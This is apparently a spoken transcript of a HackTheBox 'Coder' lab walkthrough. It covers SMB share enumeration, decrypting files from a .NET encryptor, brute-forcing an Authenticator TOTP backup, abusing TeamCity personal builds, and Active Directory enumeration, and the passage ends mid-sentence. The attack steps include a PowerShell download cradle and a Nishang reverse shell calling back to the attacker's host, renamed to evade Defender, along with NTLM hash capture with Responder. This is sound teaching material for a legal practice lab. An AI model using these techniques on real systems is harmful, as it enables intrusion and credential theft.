What's going on YouTube? This is i.black. I'm doing Encrypter from HackTheBox, which starts off with some crypto challenges that I actually enjoyed, and I normally don't say that because I hate crypto. The first one's just a simple .NET application that you can decompile and write a decryptor for. The second one is a Authenticator plugin that you can get a config file for. And the trick here is not focusing on the Argon2 hash and just brute forcing the AES data directly. Then you get the TOTP keys that lets you log into TeamCity. And TeamCity, you can do some CI/CD pipeline hacking to get a shell on the box. And with that, you can begin some ADS attacks. You get a user that you can enroll certificates for, which becomes really easy to exploit with Certify. But when this box was released, Certify wasn't really a thing. At least it wasn't this mature. And most people followed a blog post called Certifried, which does a lot of steps manually, and you gotta jump through some rabbit holes. We'll go through both of those things in this video, so let's just jump in. As always, we're gonna start off with an nmap. So nmap-sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory, and call it coder. Then the IP address of 10.10.11.207. This can take some time to run, so I've already ran it. Looking at the results, we have a lot of ports open. The first thing I notice is the simple DNS Plus banner on port 53, and whenever I see that, I scan down and look at other services like Kerberos, LDAP. There's probably LDAP-S down here. If we see this DNS as dco1.coder.htb, so based upon all this, we definitely know we're dealing with a domain controller. I'm going to copy this, and let's just start adding the entries into a host file. So sudo v etc host. And then we can do a 10.10.11.207 coder.htb dco1.coder.htb. So that is now added. Let's take a look at what's here. So we have DNS, we have a web service, we have Kerberos, and we have LDAP and SSL. There's probably 445 next, which will be SMB. It's also telling us our time is about 8 hours out of sync. So if we do anything with Kerberos, we need to sync the time first. And I think that's about it for nmap. So let's go and take a look at crackmap exec real quick. So we can do net exec smb 10.10.11.208. And this is just going to tell us some basic information. The main thing I'm looking at is the host name, and it was 207, not 208. And I guess while that goes, or it's instant, we see the name, domain, signing, SMBv1. So it's just something I like testing. We can take a look at the website. We can also do HTTPS to see if this is any different. We could go bust, try to find valid files. We could do some virtual host enumeration. There's a lot of things we could test here, but I'm also going to check SMB. So let's do -u, ipsec, -p, let's just see. If we do --shares, see if we can list shares as anonymous user. We can't. If we give it a invalid username, it doesn't have to be ipsec, it can be anything. Let's just do does not exist, and then some junk here. And then we'll give it a blank password and see if this authenticates us. It looks like it is. I forget exactly what this is called, but there's a few things like misconfigurations in SMB, this being one of them. I forget what it is, but I think when you don't specify a user, it defaults to guest. And if they disable guest, then you can't see it. But when you do specify a user, it goes to like anonymous or something like that. It's something funky there, right? But we can see there are open shares. And we have access to the user share and development share. We also have IPC, but let's take a look at the user share. So I'm going to do a SMB client, then 10.10.11.207/users. We can also do a -n so it doesn't ask us the password, and then give our name here, dir, and we have access to a desktop, it looks like, dir desktop. Let's see, dir public, nothing in here, get desktop.ini. Let's see if there's anything in this file. Let's see. It's probably going to be some encoding. There we go. It doesn't look like anything interesting. So I don't know whose desktop this is or what it is. But let's go look at that development share. So if we do /development, do a dir here, we have migrations. We go in here. Maybe it's ls migrations. cd. Let's see. cd migrations. I don't know why that dir command wasn't working, but we can see files here. And if we did a mget to download everything, it's going to take some time. We can do that. Let's make dir smb, and then we go in here, do this, say recurse on, say prompt so it doesn't prompt us for anything, and then we do a get or mget star. And that's going to download everything. But there's a little bit of overhead for every single file. Right off the bat, we see a temporary project Encrypter with a file. Definitely want to take a look at that. But there's a lot of files here, so this takes a while. Another way we could do it, if we had CIFS utils, I think it is. Let's do apt search CIFS util. I think I already have that on this. But this will be the package that provides this, right? CIFS utils. So if the next command doesn't work, you want to install that because you'll do a mount period and see you have like SMB3 and CIFS, which this provides. So let's make a directory mnt, and I can just do sudo mount 10.10.11.207 / on mnt. And then just do enter for a password. And then when we go into MNT, it's just mounted here and we have access to all the files. Now, one of the interesting was this temporary projects has Encrypter and s.blade.enc. So if I do file on Encrypter, we see it is a .NET assembly. So I've already copied it over to a Windows VM. So I'm going to go over to the Flare VM that I have, and we just want to open this up in dnspy so we can see exactly what this encryptor is. So it's loading this. Let's do file. Let's see, open encryptor. And let's see, module AES. So it looks like it's going to be an AES encryption. If I go to main, we can see it takes a argument of arg0. It takes that, adds the .enc. So this is going to probably be like encrypted. It's going to get the current time and then use that as it looks like the seed or maybe Ivy or something. So it's going to use the current time and then encrypt it. So what we want to do is write a decryptor, but first we need to know when this tool was ran, because this is the important piece of information for decrypting, right? So let's go back to our Linux VM. And if we had just downloaded this file, I bet if I do cp encryptor, and then let's go to HTTP coder, we go here, let's do a stat against the file. We see the timestamp is today. If we did a get with SMB, it's going to do the same thing. But if we did a stat while it exists on this SMB server, it's different, right? And I'm doing it on Encryptor. We actually want s.blade. So let's do a stat on s.blade.enc, and we see the timestamp. So what we want to do is convert this timestamp to epoch time. And I don't know if it's the modify or the birth. I'm going to start with this one, and then if this doesn't work, we move over to the other timestamp. So we'll just do a date-d because it does convert to Unix seconds, which is epoch, right? So we'll add this, and then I'm going to do a plus %s, and this just says the output format. So we take in this date. This is going to be how we output it. And I'm just saying output the seconds. And we have a epoch time here. So let's grab this. We will, let's just file export to project. Let's call this, or the folder it wants. We can put it in here. That's going to open up Visual Studio so we can more easily work with this program. I believe. Maybe it didn't automatically open. I can click there. And whenever dealing with something in crypto, I always like using the same language that it was encrypted in, right? Because if we decided to switch over to Python and write a decryptor, I think this is just AES, there's a chance like the IV or some other value that's just default won't be the same because maybe the library sets that. So that's why you'll see me just saying, you know what, let's do this in .NET since that's what it started in, right? So I'm going to copy the encrypt function. And we're going to make a decrypt. So we'll do decrypt file. We give it a source file, give it the destination file, give it the key and IV. And looking through, starts this. It opens the destination file in create mode so we can write to it. Then it's going to create a encryptor. I'm going to guess there's a thing called a decryptor. Doesn't have errors under it, so it looks like that is fine. If I did not know that, I could probably just type like this and then period and see the functions that it has, right? So we have the decryptor. It's going to open and write the contents to it. Okay, so now what we want to do is change main. I don't like having to specify arguments, so let's just do a source file is equal to, that's not what I want. Source file equal, and then we'll do C:, probably 2 backslashes, users, IPsec, desktop, coder, and we'll call it s.blade.enc. Do we have to call that a string? There we go. And we'll do the same thing with destination. And we'll just do s.blade. Okay, let's get rid of this if-then statement. Okay, so file info, I don't think we need that. We don't need text because we've changed those. So this is source file and then destination file. Okay. And then let's see. This is getting the current time and going to time seconds. I can just say long num is equal to, we don't have that on our clipboard anymore. Let's go back here, copy this. Paste that. Okay. Encrypt file, we want to call decrypt file. And we can figure out what these are. So let's see, array2 is really the key. So I'm going to call it key because I definitely hate these generic names. There we go. And then I'm guessing the other thing is IV. So let's call this IV. Okay. And let's see. This random, this has to be seed then, I think. And we can say this will be IV. I think that's it. Let's see if it actually decrypts. So in here, we have s.blade, nothing else. We're going to run this. It did not pop out an error. And we have a file. So I'm going to copy this back over to my Linux machine, and we'll examine it to find out what type of file this is. So copying it over, And Finder tells me it is a 7-zip. Let's just go and take a look at it. So we can do a file against s.blade. We see it is a 7-zip archived. So I'm going to make a directory. We'll call this decrypted, maybe. I don't know a good name for it. And let's just move s.blade over here. And I'm just going to add the 7-zip extension because that's the type of file it is. So we can do 7zl to list files in this. And we have two. We have .key and a KDBX. So this is going to be a Keepass database. I'm going to do a X to extract it. And we can see both of those files extracted. So if I do kp CLI, we can specify a key. So let's do -- key. And then we do the database with -- KDB and then s.blade.kdbx. I'm going to probably just do no master password, and it does let log in. So if we do ls, we have root, we can go into root, and we have 3 different options, right? We have the Authenticator backup code, Office 365, and TeamCity. And there is a new host name here. So let's just add this to our host file. So sudo v etc host, and then we can add TeamCity dev. And let's try navigating there. So https teamcitydev.coder.htb. Let's just go here as well. HTTP. So this one goes to IIS, but HTTPS looks like it is logging in here. So if we do a show, I think -F2, we can see this. And it gives s.blade and the password. So let's try logging in. So we do s.blade, put this password in, and it wants a multi-factor code. So if we do a show -F0, we have the Authenticator backup code, but it looks like it is encrypted. So before I go there, I'm going to do show F1. And we have s.blade at coder and this password. So let's try crackmap exec against this, right? So we can do net exec smb-u s.blade-p, put in this password, and then 10.10.11.207. 10.10.11.207. It always throws me off that that goes before the arguments. There we go. And it looks like we have access. We can do -- shares. And let's see, is there anything else? So we had access to, I think, development and users before. We have net logon because we're now a valid login session, sysvol, and users. We could try SMB client -u s.blade at coder.htb 10.10.11.207/users, and maybe we get into a different folder. Maybe we get into s.blade's home directory, right? It does not look like it. This looks to be the same place. So this doesn't really get us much. We could run Bloodhound now, but Bloodhound's not going to buy us much. So all I'm going to do is v-creds.txt, and we'll do s.blade this. And if I was doing the box blindly, I probably would be running Bloodhound here and looking through, but I want to try put all the Bloodhound stuff in one spot so it stays a bit more organized. Because the next step is cracking this Authenticator backup, right? So we got to figure out exactly how this is used, or what generated this. So if we look at the title, it says Authenticator backup codes. And this is actually the name of a piece of software, right? I think I already installed it to Firefox, but if we do Authenticator, let's just say Firefox plugin. We could also look at Chrome plugins, but I don't have Chrome installed. That's why I'm looking at the Firefox. So if we do this, we have the Authenticator app. I already have this installed, so I'm not going to install it again. So we just go here, we can run this, and I need to delete these. Let's just delete the codes. Sorry about that. I forgot to clean that up after testing the machine. So we have a blank authenticator. What I would do here is figure out exactly how to add a code. So let's go click on the little pencil icon plus manual entry. Let's do issuer IPsec secret ABCD invalid account secret. I think it has to be a certain length. There we go. I think it has to be at least 16 characters. And we have a authenticator code. So what I do next is let's try backup. And then we will go, let's see. Whoops. HTTP coder. And I'm going to call this ipsec.json. And when I installed this, I put the password of test, I want to say. I probably should have just removed the extension. So if I cat ipsec.json, we have the same exact format as we saw on this, right? Even like down to the UUID and everything. So what we want to do is figure out how this application encrypts things. My first step was I tried getting a bunch of Argon 2 crackers. We could also do like Argon 2 hash validation. Let's see. Does this have anything online? Argon 2 online. We could try it if we scroll down, but it never actually worked for me. No matter what hash, the plaintext didn't line up even though it was. So I'm not exactly sure how Authenticator is using the hash. And when we do the code, we're actually going to ignore this altogether. And the reason why is it turns out these variables are just two AES encrypted things, right? Argon 2, this has like key extension, a bunch of things to make brute forcing this slow, right? So if it takes a long time to brute force this, however, all we use this hash for is probably to decrypt this secret, which gets us the key that then decrypts this secret. We could just try to decrypt this right off the bat because doing one round of AES 256 is going to be much faster than doing one round of Argon 2, right? So that's going to be why we kind of just skip this whole hash and why we don't need it, because it would be faster to just, in this case, try to crack the AES data, right? And just skip the whole like Argon 2 altogether because that's slow. So if we went, let's see, Authenticator, let's see, I probably had it here before I did Google, right? Let's see, Authenticator, Firefox, here's the plugin. Do they have a link to the GitHub here? Homepage, support site. Oh, they linked open source. And homepage brings us here. So the source code to this Authenticator plugin is all open source. So that means we can easily see what's going on. And I say easily in jest because it is going to be a bit tougher. Looking at Webpack, we see a bunch of TS. So I'm guessing this is going to be TypeScript, which I have zero experience with, right? So this is probably going to be like the Argon tool, background, content, pop-up, import, options, debug. I'm going to search for import first. This one looks to be the most where it would have like custom functions like the decrypt it's using. So let's go to source import. So if we go to source, import TS, and I just go to decrypt, we see there is a function decrypt backup data. So it's going to take it in, and then it's just going to use crypto.js AES to decrypt it. And again, just like the last piece with .NET, I don't want to use a different library to try to decrypt this, right? We don't see AES passing in like an IV or anything else. It's just using all data that's probably from the library. So we'll have best results using the library. So we'll want to create a JavaScript, or not JavaScript. Oh yeah, a JavaScript thing to decrypt this. And I had a lot of help with OXDF on this method. When I was originally doing the box, I was tracing how to do Aragon. OXDF is the one that I was like, why don't you just decrypt the encrypted and secret, because that's going to be faster. So let us begin cracking this. So I'm going to make a directory. Let's just call this Aragon. Oh, no, it's not even going to be Aragon cracked. Authenticator crack. Yeah, that's fine. And then we can open up, let's just touch brute.js, we'll call it, and then open up Visual Studio Code here. Once that opens, we will begin. So the first thing we want to do is just be able to read a file. So I'm going to do a const fs is equal to require fs, and then we will do a read line is equal to require read line. So these are just standard modules, file system and read line. So we can create a, I guess we'll call it a read interface. And then read line, create interface, sure. And it's having us read a hard-coded file. We could do that. We could also specify the file ourselves. So here we could just do process.argv2. One will be the process itself. So that would be the script. 2 is the first argument. So we have a read interface. So we can do read interface on lines. I don't know if we need function here, but I guess that's fine. Console log line like that. Let's see. There we go. So let's test this out. So let's do v ipsec.text, and we'll say ipsec was here. So if I do a node on brute.js, invalid argtype, function line, let's see, that. There we go. Let's try this. Let's see, main.js, where are we? Oh, crap. I got rid of that change. There we go. The issue was I just didn't give it a argument. We probably should say like if length of process argv is less than 3, let's say 2. It's probably len, not length. What is it? It's length, right? I'm missing something. There we go. So now if I give it that, let's go back to what I think it should be. Length is not defined. This should not be this difficult. Get length of process argv. That is what I had. Oh my god. JavaScript get length of array. It's probably a list, but that should still get it. Array length. Clothing dot length. Dot length. There we go. Awesome. So that took longer than it should have, but hopefully that eliminates your imposter syndrome if I can't code either. So we have this. We should check if the file exists before trying to open it, but you saw how much trouble I had here, so we're not even going to attempt that. Let's see. So we're going to read lines. We have a console log line, so now we actually want to test this. Does it read ipsec.txt? It does. So now that we can read a file, what we want to do is create crypto.js is equal to require crypto.js. Okay. And this is the library it was using to decrypt. It was just a crypto.js AES decrypt, right? So let's see. What we want to do is probably create all the secrets. Let's go back here. And this is going to be the Keepass output. We have two secrets. This is going to probably be the encrypted key. And this is the probably TOTP, we'll call it. So let's grab this and say const encrypted key is equal to that. And then we'll do const TOTP secret. And we'll say encrypted TOTP secret. And we will give it this. Okay. Both of those end in semicolon. That is good. Okay, let's see. Instead of logging the line now, what we want to do is var key is equal to crypto.js decrypt. I don't know if we want to say this is UTF-8. Let's see. We'll do var TOTP secret is equal to that. And then let's just do console log TOTP secret. Okay. So what I want to do is comment these out real quick. This will be, we'll call this s.blade and ipsec. And I want to say my key, my passphrase was just test. We have that as well. I think that was .. ipsec.json. Let's use these values so we can test exactly what this looks like. So const encrypted key, and then const encrypted TOTP secret. Grab this. Okay. We do that, and then we log. So let's open our ipsec.txt. And I want to say I put the password as test. So let's do node brute. Module not found. Oh, we have to do npm install crypto.js. Node brute. Also specify the file. Let's see. Malformed UTF data. Let's see. Let's just get rid of this. And we have hex. This looks like. So xxd-r-p, echo this. We probably need a-n. And that looks to be fine. Let's see if I put something bad in ipsec.txt. Let's do, that's our key. What happens here? We get no data. So that may be fine. I was expecting this to be longer. But let's just move on with that assumption. So test, like it not showing anything is great. That's probably just non-ASCII characters, right? Let's do this again. XXD. No, it just did not put anything. Okay. Oh, that is 16. Right? Yeah, that is definitely 16. It's 16 in hex, its length. So what we want to do is have our script decode. Oh, we want key there because we're decrypting both with that. Let's see, what does this look like? There we go. That is what I expected, actually. ABCD, ABCD, ABCD. That's what I had typed when I was generating the secret. So that is what we want. And that is exactly what I expected. So it just working with this was blind luck, right? Or not even luck. It was horrible luck because it's still decrypted to an ASCII value. And that's not what we want. Well, that is what we want, but it didn't decrypt to the right one. So let's do line key. There we go. So what we want here is this toString to give us ASCII. And we'll do a crypto.js encrypt UTF-8. So now, when I run this without the XXD, it just shows me this. So what I'm going to do is wrap this in a try catch. And we're just going to not handle errors. And the reason why I'm doing this is now that we're specifying this UTF-8, if we get data that is not UTF-8 decryptable, then it's going to throw an error and we don't want the script to bail out. We just want to keep continuing. So if I do this, does this now work? It does. And I'm going to make this change back. Let's do line. And if we console log error, it's going to say something about it not being, it's being malformed. And the reason why, I think, is there's non-UTF-8 value when we did it the bad way. It's still displayed like it was human readable, like this is ASCII, but it had non-ASCII in here, is what I'm guessing. So I think this may be all we need once we fix this back up. So if we can decrypt it twice and we don't throw an error converting it to UTF-8, go here. So let's put the production keys in. We can run this, and I'm going to do user share word list rocku.txt. And we definitely don't want to log errors anymore. I think we can just call break. Or maybe, how do we end? Exit 0. Okay. And I also want to log, let's see, we'll do passphrase is the line. And then TOTP is the secret. That looks fine. We run, and I don't think that is going to be correct because the TOTP is short. So what we want to do is make sure the seed is of length, right? So we can say, let's see, how would we do that? If TOTP secret length does not equal 6, I think it knows it was 16 characters. Exit there. And let's just do if TOTP length is greater than 15. I know 16 was the minimum, but I don't know if it could go more, right? So we run this. And maybe we don't return. Oh, we're still doing ipsec. There we go. So we're going to run this. Hopefully it cracks within a couple minutes. If not, we did something wrong. Let's see. We do TOTP secret length 15. That should be right. Let's see. Actually, before I do that, we'll add that return back in. I'm going to test one last time with my data. That looks good. Let's put some bad things in here. Okay. So I'm confident our script looks good. I'm going to put a time here, and I'm just going to let this run, and we'll see if it finishes and outputs anything or if it doesn't. So yeah. And almost as soon as I stopped hitting record, it finished. We can see it only took 27 seconds. We got the passphrase of s.blade, and here is the TOTP. So if we wanted to decrypt that file, we could, but we could also just insert the TOTP, right? Let's see. I hate this interface. Plus manual entry. Issuer, we can call this TeamCity. And then the secret should be this value. And of course, the authenticator exited. Plus manual entry. There we go. TeamCity. Okay. So now we have a MFA key. So let's test it. And if this didn't work, then I would probably try to import. Invalid. Actually, if this doesn't work, the first thing I want to do is make sure my date's in sync. Remember when we did nmap and it told us we're about 8 hours off? That could be breaking this, right? Because the whole purpose of TOTPs is based upon time, right? So if the server time is 8 hours off, or off by over a minute probably, the whole pin code thing's going to break because the seed is being generated with invalid data, right? So let's copy this, put it in, and it's taking longer. It did not reject it immediately, so I think that was it. So definitely make sure your time is in sync when entering any TOTPs, right? Because they are time-based. The login does take a while, but it looks like it is working. And now that we're logged into TeamCity, we should ask ourselves, what the heck are we logged into? So I'm going to go and say, what is TeamCity? And the software was called JetBrains, or the publisher. And it's just a CI/CD tool. So we're probably going to be doing some type of CI/CD pipeline exploitation in this. Or maybe there's just a secret somewhere in this. If I click on build config, let's see. If we go to changelog, let's see what there is here. Success, nothing there. We got a build log though. So let's download the build log and see if it says anything interesting. So C:\TeamCity build agent temp, checkout directory, updating source. Step 1, it is running PowerShell. And we see it execute something and just says hello world. So if we looked at the SMB more in depth, let's see, if we go to migrations, TeamCity test repo, I think it was, there is a hello world.ps1, which is this file. We don't have write access here. Neither our anonymous user or s.blade had read-write on this file system. So there's not much we can do. It is a get, right? Dubious, what? I don't know what I'm doing with this command. But we'll run it and hope for the best. Do get log. It's taking its time because this is an SMB mount, so it's got to read a bunch of files. We just see Sonia Blade. So we have who S is. So this is Sonia's account. We want to figure out a way to edit this, right? We could click on other projects, but if we click here, there is this flag that says run as personal build. And if we do, it says click or upload a patch diff. So what I'm going to do is let's copy this TeamCity repo to our box. We have to do a -r. So this is going to copy the get and this. And I just realized we did download every single file already. So maybe I did not need to do this, but it doesn't take too long. Now it's done. And then let's go in TeamCity. We can edit helloworld.ps1 and let's put please subscribe. Okay. And then if I do a get diff, we have the diff file. So I'll just call this diff.txt. And if we upload this, let's go HTTP, coder, TeamCity test repo, diff.txt. Run build. We can see if we can change the output. If we can, then we can just put our PowerShell stuff in this file and get it executed, right? So it is running. It's taking its time. Loading tabs. I may have wanted to prioritize it, because one of the options was put it on top of the queue, right? I don't know if that'd be faster. Updating sources, hello world. If we do show full log, step 1.1, and we see, please subscribe here. So it definitely does run. So what we want to do is edit this. So I'm going to do hello world.ps1, and I'm just going to say IEX new object net.web client download string. Is that right? I think we go like that. HTTP 10.10.14.8. We'll listen on 8000. I'm going to call this shell.ps1. And that, and that. Is that the valid PowerShell cradle? I think that's valid. Let's see if it executes. cd make dir dub touch shell.ps1. Actually, let's copy cp user share nishang shells invoke PowerShell TCP one line.ps1. Okay. And let's send the shell to 10.10.14.8 9001. So Python 3-m HTTP server. We'll do rl wrap nc lvnp 9001. And then get diff. diff.txt. So now we have this running our code. That IEX line does not look right to me, by the way, but maybe it still works. Let's run it. And we'll see we do get a hit on shell, but nothing here. Do we have anything in the output? The script contains malicious content and is blocked by antivirus. So Defender is catching this. And a about a year ago. I forget exactly what video it was, but we did do some defender evasion on this. Let's go ipsec.rocks. I just do nishang AV. It was probably the search video. That's why I was playing with this live and figuring it out. But let's kind of redo what we did there. So let's change all client, and we'll change that to ipsec. And we probably should do $client, $ipsec. And then I'm going to go over to the next variable, which is stream. So we'll just rename this one. So we'll do $stream is equal to, we'll call this please sub. Okay. Let's look for the next unique thing. We may want to rename bytes, but I don't think we'd have to. We can do data. We'll do $data, the stuff. Okay. I'm going to do send back as well, because send back seems like it could be flagged on. So we'll call this $send back, and I'll say stuff. Okay, I think that may be what we need to do. And in that one video I had referenced, I also deleted this PWD path. So we just remove this, and I'll delete PS as well. I think that's what I did. Let me see. Yeah, I'm pretty sure that's it. That's part of the console prompt, which funnily enough is part of the flag. So let's save this and see what happens when we send it now. So because we just used the cradle to install, it's just doing an IEX. We get lucky and don't have to modify the get diff, right? That's why I wanted to do it this way, because it just makes it so much quicker. And oh shoot, we forgot to listen. I still caught it, and we got the shell. So let's do who am I? And we can see we're curator/service TeamCity. So we have successfully got access to this account. So we could try to get the password. Let's see. Let's do sudo responder-i ton0. Okay. And then let's do get file 10.10.14.8 and just a random thing. So this is going to make an SMB request to us. I thought it would. Maybe not. NC LVNP 445. Let's just see if that command did anything. It did not. It's probably get file contents or something that I need to do. Does type work? Type does. So we'll use type. And there we go. We got a hash for TeamCity. So we can start trying to crack this in the background so we get the password. We can also just do further enumeration, right? We are in C:\TeamCity build agent work. If we look at anything else here, what isn't old? We do cd.old, nothing. If we go to program data, that's it, right? Yeah. Let's see. There is a JetBrains. And the thing I was looking for when I was poking around at these directories was, what was it? Like credentials and things like that. That's why I was going in here. We can go in config. Let's see. Type main config.xml. SVC, nothing. So would want to poke at all of these to see if like password or anything is in these configs. And it looks like our shell died. So there is a timeout, which is annoying. We could probably like spawn a new process and then execute it. But I don't know how to do that off the top of my head. So we're not going to do it. The downside of doing these videos live. Let's do program data. I guess the easiest thing would be like upload netcat64 and then just run that, right? Like cmd.exe/c, start a new process and run it that way would probably be the easiest. We don't have to do that. If we went in system, let's see, what is here? Artifacts. There is also changes. And if we look at changes, these are going to be our changes. I think this is like the personal builds, maybe. I don't know exactly how this populates, but these are all us, 12.14. We also have one on 11.8. If we type this out, we get a lot of changes. And one of the key things is we see this is going to be encrypted.text. There was a key, convert to secure string. So let's copy all of this. This is going to be get ADCS report. And that's a diff get as well. So I'm going to copy that. And then let's go on the mount. And we want to find where that is, if that does have a repository. If we go to migrations, there is ADCS reporting and get ADCS report. So it's probably going to be this. So let's cp-r ADCS reporting back to our box. And then we're going to apply this diff and extract the files out of it. I'm sure we could just carve it out manually by hand, but this is infinitely easier. So it is copying. Let's go in that directory. We can just call this diff.get. Let's see. Paste that in. So again, if we look at this, it is just the diff. So let's do get apply this. Did it apply? It did. So it applied and also gave us a warning that the permissions were wrong. But now we have a key and encrypted.txt. So if we look at encrypted.txt, it looks like it's base 64. If we look at key, here's a bunch of bytes. So if we do this, they are doing a get content and then cred to pull this password. So we essentially want to copy this and just output the password, right? And we can't decrypt it on our machine because the secure string uses a variable that's on the host itself. But because we can go on the host and run it as other users, we can safely do all of this. So what we want to do is get the key and encrypted text onto the box, and then we can run these. We could also probably apply the get diff to this all, but let's actually do that. That should be easy. So I'm going to copy the encrypted text in the key, and we're going to copy it to the TeamCity test repo. This is the one where we have hello world. And let's see. All I want to do is get add on encrypted.txt and key.key. Okay. And now if I do get diff here, it is not adding. I wonder if we have to specify all the files. So we'll do encrypt text key. No. I bet if we just did the head, which will be compared against the last commit, it looks like that does it. So let's do get to this to diff.get. So now when we get the shell, it will automatically have some things we want, right? And did I have? Yeah, I do, right here. Okay. So let's go here. Let's run as personal. Diff. Run. It's going to get shell. I'm going to do a dir. And we don't. I really thought we would have the key and whatever in here. Probably because I called it something different. It's by diff.get. Yeah. And diff.text is the old thing. Let's try this again. So we'll run personal build. I should have deleted the bad one, diff.get. There we go. Connection, dir, and we have the files. That is awesome. So if we go up one directory, it was in the ADCS reporting. If we look at the Get-ACS report, how it does it, we can just copy this. Then we copy the password. And then we can do cred. And if we output cred, write host cred. Is it cred.password? That doesn't seem good. Echo pass. Echo key. So key worked, password did not. Not sure exactly why. That's cat encrypted.txt. This is the file it's reading. I wonder if this is all just one file and that line break is screwing it up. Let's copy that to www. Curl 10.10.14.8, 8000, encrypted.txt, out file encrypted.txt. I see the download went off. Let us, it's still here, right? I can just hit, oh, I'm not in RL wrap. Shoot. Let's do pass again. That looks better. We got something back. We can do cred. There we go. And then cred.password. It is secure string, so we have to decrypt that, but our shell died. So we're getting close. Let's see. Let's go back here. If I do encrypted.txt, I already put it on one line, so shoot, I did not mean to delete that pane. I want to create a new diff.get. Let's remove those. We say get diff head, then diff.get. That looks good. So now what we want to do is get the password and make sure we can decrypt it. So let's go back here, get our shell, personal build, run. Okay, we have it. And then, where is it? Key.key. Here we go. Grab this line. Paste. Let's get pass. Paste. Make sure we have the system secure string. Create the cred object. Okay. And then I think the thing I did not do was get network credential. There we go. So we got e.black as the user. And we also want to grab the password out of this. .password. And that's his user credential. Okay. already have creds.txt open. Not you. Here it is. E.blake, was it? e.black. Okay. So we have these two users. Let's do net exec smb 10.10.11.207 e.black and the password this. I'm guessing both these people are using the same password manager. The passwords look eerily familiar, just based upon the length and types of characters. Let's see. We have a success, but we can't log in with SMB. If we do winrm, it looks like we can. So the other user, we could not do winrm. This one, we can. So let's do evil winrm -I, the IP 10.10.11.207, u, e.black, and the password. And this will get us a shell that I guess we're not going to use right away. Remember a little bit ago, I was talking about there's a lot of enumeration we could do with things like bloodhound with the previous user that we just didn't do because I want to put all that enumeration in one part of the video. So this is it. Typically, whenever I get a user, let's just exit Keepass, I would do things like run bloodhound. So we do have, I think bloodhound Python. Oh, I run it in Docker. That's it. So if I go opt bloodhound, that's not it. Let's do bloodhound py. We have this. We could install it with mpacking and everything, but I've gotten in the habit more of just using the Docker files because it will automatically like keep everything up to date. Like when we build this Docker, it will go and pull mpacket and set it all up for us. This one's a bit annoying because it does have some dependencies that just create for painful times. So I would do like docker build -t for tag and call it bloodhound py, or I forget what I called it. But I already have it built. That's what I did to build it. I called it bloodhound-python. So what you can do once you have that is you just do docker run, and then we specify what directory we want to share with this container. So I'm going to share home, ipsec, htb, and the box, which is coder, and then a colon where we want to share it to. I think the correct place is like bloodhound_data, but it really doesn't matter. I'm always in the habit of just mounting to /mount. Then we say we want interactive and specify bloodhound-python. So this is going to stand up the Docker container, and now we have bloodhound here. I'm just going to go into mount because this is where we have shared it with the host. And we can say bloodhound data here, and we can run it. So let's do bloodhound-python. We're going to collect everything. The user, e.black, password. That's not it. Let's see. The quickest way to get that would be go down here, cat creds, copy. Put that in. So we got the password in. Then we want to specify the name server of 10.10.11.207. The domain, coder.htb. The DC, we'll do DC01, coder, htb, and zip. So I think this will run. It says LDAP authentication is refused because LDAP signing is enabled, and then it goes to use LDAP-S and starts dumping everything. We could do it with each user, but Bloodhound doesn't really get better with the more users you do it if you just target the domain controller because it's not like querying private information. If you do start querying the domain and going to all the computers in it, of course, if you have like different accounts, see different things. But now we have the Bloodhound data. Let us go in opt Bloodhound like this. And I also want to start neo4j. So I'll do sudo neo4j console. This starts the database that we will import everything in. And then we just do, it's a /bloodhound. And then once this opens, we just want to drag and drop our data into it. So I can go here, drag this, and it will upload all the bloodhound data, and we can begin looking at it. Spoiler, we don't really get that much, but there's some cool things we can look at that I don't think I've shown before. I forget exactly how to zoom in on bloodhound. Hopefully this text is fine. Let's see real quick. Bloodhound zoom text bigger. I know it's just a Chrome window. Font size. That Reddit post may be good. Come on. There we go. Don't see it there. I've done it before. Don't know how to do it now. Hopefully it's good. When I need to type stuff, I'll just move away from that. So the one thing we will want is to turn debug mode on, and you'll see why that's important in a minute. But let's just do some analysis. We have e.black, so we can add him, mark as owned. We also have the TeamCity account. We can mark as owned. Who else do we have? We have the s.blade. Mark as owned. Okay. And then you could click around and do the shortest path from like own principles. And you'll find there's really no paths. I did not click that. Own principle. There we go. s.blade. e.black. e.black can PS remote. So that shows us the remote desktop that we already knew about. So there's really nothing here if we just keep clicking around. Doesn't show any vulnerabilities. And one of the things I don't know how to show from this, but we can do it manually, is the OUs, because that's going to be important. If we go to database info, we can see there's 10 users, 5 groups. Oh, that's on-prem objects. Wait, did I not get OUs? There should be OUs. AD. Refresh database stats. There we go. I guess this pulled it when it was still loading. So there's 55 groups, 1 computer, 5 OUs, 3 GPOs, 1 domain. So what we want to do is show me all the OUs in this. We could look also, before we do that, I guess, look at the groups. So what I would normally do is look at outbound control and see what things are. So we have e.black here. And e.black is a member of domain users, PKI admins, and remote management users. PKI admin is not a default group. If we click on it, it says it's for managing the ADCS certificate and template management. So let's take notes real quick as we go through this. So v notes.txt, e.blake, PKI admin, and let's just say modify ADCS templates. So what that tells me is this enables us to create certificate templates, which then we can later abuse. So the first thing I would do after seeing this is, can e.blake enroll computers? Because if he can, that's an easy one to exploit. So let's go back to the netexec. That was 3, I think. Do I have it here? I guess we just type it again. Cat SMB or creds. So we can do netexec, LDAP, then 10.10.11.207 -u, e.black -p, put in his password, -M, MAQ. This is going to get the machine account quota attribute from LDAP. And on other boxes, we're able to enroll it. This was probably sent to 10 because that's the default. It's now 0. So we can't enroll a computer. If we look at s.blade, can Sarah enroll a computer? So let's do s.blade. Forget exactly how to delete the whole word. There we go. It's going to run, and machine account quota is 0. So we can't do enroll computers right now. So we know e.black is a member of that. Let's go look at the TeamCity account. So service, TeamCity. Let's go to outbound, transitive object control. Doesn't show me anything. So let's go to the next one. S.blade. Let's go to Sarah. I guess I have to click here. There we go. Oh, it's Sonia. I thought it was Sarah for some reason, but it's Sonia. Let's see. Click here, and we can see what Sonia is a member of that I used to call Sarah. So domain users, build agent management, and software developers. So let's do s.blade. And I'm going to put the unique groups. So she is a software developer. And what's the other one? We'll do build management. Build. Is it AGT? Nope, AGENT. MGMT. So Sonia is a member of both of these groups. We don't know what these groups do. The comments, I think, are blank. Let's see. Domain. I don't see a comment here. Go to developers. And this is just the CI/CD development. So it's TeamCity build agent management. So there's not really any information. The one thing that we haven't been able to see right now is OUs. And think of that as just like the folder structure within Active Directory. Bloodhound can show it. We just have to go to do a raw cipher query. And when you have debug enabled, you can see all the queries that are running. So you can get an idea exactly what it's doing, like find domain admin, well, matching, going after the group relationship, and showing members that are a part of it, right? So this is the like arrow directional thing. I'll copy this here. So that's what the query was. We're going to kind of change it. And this is saying like, show me the relationship with at least one member. So it's not going to show 